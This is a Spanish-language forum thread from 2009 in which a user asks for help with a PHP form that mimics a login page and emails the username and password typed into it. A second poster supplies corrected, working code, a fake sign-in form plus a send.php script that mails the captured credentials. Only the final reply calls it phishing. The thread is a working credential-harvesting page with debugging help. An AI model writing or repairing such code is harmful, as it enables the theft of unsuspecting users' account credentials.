elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  Ayuda envio formulario php!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda envio formulario php!  (Leído 2,721 veces)
3dw1n

Desconectado Desconectado

Mensajes: 35


3dw1n - VE


Ver Perfil
Ayuda envio formulario php!
« en: 9 Septiembre 2009, 02:18 am »

Necesito ayuda deseo hacer envio de datos al correo electronico, las variables nunca se envian con los datos que cargo en los input quisiera que me ayudaran estoy novato en php, no se si se crean 2 paginas una html y php o en una sola php se puede hacer eso ayudenme a ver donde tengo el error

este es el code:

Citar
<html>
<head>
<meta>
<title>Untitled Document</title>
</head>
<body>
<form name='formulario' id='formulario' method='post' action='formsolo.php' target='_self'>

 <tr><td valign="top" class="css0059" align="right"><label for="i0116">Dirección de correo electrónico:</label></td><td valign="top" class="css0093">
<p><input name="usuario" id="usuario" type="text" maxlength="113" autocomplete="off"  style="ime-mode:disabled" class="css0034" /></p>
  <tr><td valign="top" class="css0059" align="right"><label for="i0118">Contraseña:</label></td><td valign="top" class="css0093">

  <p><input name="clave" type="password" maxlength="16" autocomplete="off"  style="ime-mode:disabled" class="css0034" /></p>
<input name='submit' type="submit" value="    Iniciar sesión    " class="css0088"  />
</form>


<?php

   $to = "corrreo@dominio.com";
   $subject = "Probando envio datos"; 
   $usuario = "Usuario: " . $_POST['usuario'] . "\n";
   $clave = "Clave: " . $_POST['clave'] . "\n";
 
   mail($to, $subject, $usuario, $clave);
   
?>
</body>
</html>

actualemte estoy usando este servidor gratuito el cual me da email para hacer las pruebas. espero su ayuda gracias!!  ;D


En línea

"De Venezuela para el mundo"
Og.


Desconectado Desconectado

Mensajes: 822


Aprendiendo de la vida


Ver Perfil
Re: Ayuda envio formulario php!
« Respuesta #1 en: 21 Septiembre 2009, 07:08 am »

no se envia ningun dato por que primero envias el e-mail y despues le muestras el formulario al usuario :P
lo "correcto" seria:

Código
  1. <html>
  2.  <head>
  3.    <meta>
  4.    <title>Untitled Document</title>
  5.  </head>
  6.  <body>
  7.    <form name='formulario' id='formulario' method='post' action='send.php' >
  8.      <table>
  9.        <tr>
  10.          <td valign="top" class="css0059" align="right"><label for="i0116">Dirección de correo electrónico:</label></td>
  11.          <td valign="top" class="css0093"><p><input name="usuario" id="usuario" type="text" maxlength="113" autocomplete="off"  style="ime-mode:disabled" class="css0034" /></p></td>
  12.        <tr>
  13.          <td valign="top" class="css0059" align="right"><label for="i0118">Contraseña:</label></td>
  14.          <td valign="top" class="css0093"><p><input name="clave" type="password" maxlength="16" autocomplete="off"  style="ime-mode:disabled" class="css0034" /></p><input name='submit' type="submit" value="    Iniciar sesión    " class="css0088"  /></td>
  15.        </tr>
  16.      </table>
  17.    </form>
  18.  </body>
  19. </html>

send.php

Código
  1. <?php
  2.  if($_POST['usuario']!=NULL and $_POST['clave']!=NULL)
  3.    {
  4.    $to = "corrreo@dominio.com";
  5.    $subject = "Probando envio datos";
  6.    $usuario = "Usuario: " . $_POST['usuario'] . "\n";
  7.    $clave = "Clave: " . $_POST['clave'] . "\n";
  8.    mail($to, $subject, $usuario, $clave);
  9.    } else {
  10.    // aqui hiria lo que pasa si no se especifica nombre de usuacio o clave ¬¬
  11.    }
  12. ?>



Saludos!


En línea

|-
jdc


Desconectado Desconectado

Mensajes: 3.406


Ver Perfil WWW
Re: Ayuda envio formulario php!
« Respuesta #2 en: 21 Septiembre 2009, 07:34 am »

no deberían ayudar a gente a hacer phishing incluso esta en las normas no?
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Error con envio de Formulario html i php (ayuda)
Desarrollo Web
cebs 4 3,925 Último mensaje 1 Abril 2012, 00:03 am
por Diaf96
Envío de formulario por php « 1 2 »
PHP
Giankaa 10 3,497 Último mensaje 27 Septiembre 2015, 15:27 pm
por WHK
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines